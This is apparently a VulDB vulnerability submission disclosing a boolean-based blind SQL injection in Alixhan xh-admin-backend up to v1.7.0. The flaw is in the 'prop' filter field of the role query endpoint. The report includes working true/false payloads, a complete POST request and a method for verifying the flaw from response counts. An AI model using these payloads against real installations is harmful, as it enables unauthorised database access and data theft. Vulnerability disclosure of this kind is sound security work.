| Title | Alixhan xh-admin ≤ v1.7.0 SQL Injection |
|---|
| Description | Title: SQL Injection Vulnerability in xh-admin ≤ v1.7.0
BUG_Author: sageee
Affected Version: xh-admin ≤ v1.7.0
Vendor: Alixhan GitHub Repository
Software: xh-admin-backend
Vulnerability Url:
● /frontend-api/system-service/api/system/role/query
Description:
1. SQL Injection via Role Query:
● In the xh-admin-backend system, the endpoint /frontend-api/system-service/api/system/role/query allows users to query role information.
● The application fails to properly sanitize user-controlled input within the JSON body. Specifically, the prop parameter inside the filters array is directly concatenated into the backend SQL execution statement.
● This creates a SQL injection vulnerability where attackers can inject arbitrary SQL commands.
2. Exploiting the SQL Injection:
● By manipulating the prop field, an attacker can modify the WHERE clause of the database query.
● This vulnerability allows for Boolean-based Blind SQL Injection. An attacker can infer database content by injecting conditional statements (e.g., AND 1=1 vs AND 1=2) and observing the difference in the response (specifically the total count or returned data list).
● Successful exploitation can lead to unauthorized data retrieval, schema enumeration, or potentially full database compromise.
3. Example SQL Injection Payload:
● The injection occurs by breaking out of the existing SQL context (likely wrapped in backticks) and injecting logic.
● Payload for True Condition:
"prop": "id` = `id` and 1=1 and `id"
● Payload for False Condition:
"prop": "id` = `id` and 1=2 and `id"
4. Requesting the Endpoint:
● Send a POST request to the target system with the malicious JSON payload.
True Case Request:
POST /frontend-api/system-service/api/system/role/query HTTP/1.1
Host: <target-ip>
Content-Type: application/json;charset=UTF-8
{
"isExport": false,
"isPage": true,
"currentPage": 1,
"pageSize": 20,
"param": { },
"filters": [
{
"prop": "id` = `id` and 1=1 and `id",
"condition": "eq",
"value1": 1
}
]
}
5. Verifying the Exploit:
● Verification is confirmed by comparing the server responses for the True and False payloads:
○ When 1=1 is injected: The server responds with HTTP 200 and returns valid data (e.g., total: 1 and a populated list array), indicating the SQL query remained valid and true.
○ When 1=2 is injected: The server responds with HTTP 200 but returns empty data (e.g., total: 0 and an empty list array), indicating the SQL condition was forced to false.
● This behavioral difference proves that the user input is being executed as SQL logic. |
|---|
| User | sageee (UID 82251) |
|---|
| Submission | 02/06/2026 06:17 (4 months ago) |
|---|
| Moderation | 02/18/2026 08:43 (12 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 346461 [Alixhan xh-admin-backend up to 1.7.0 Database Query query prop sql injection] |
|---|
| Points | 17 |
|---|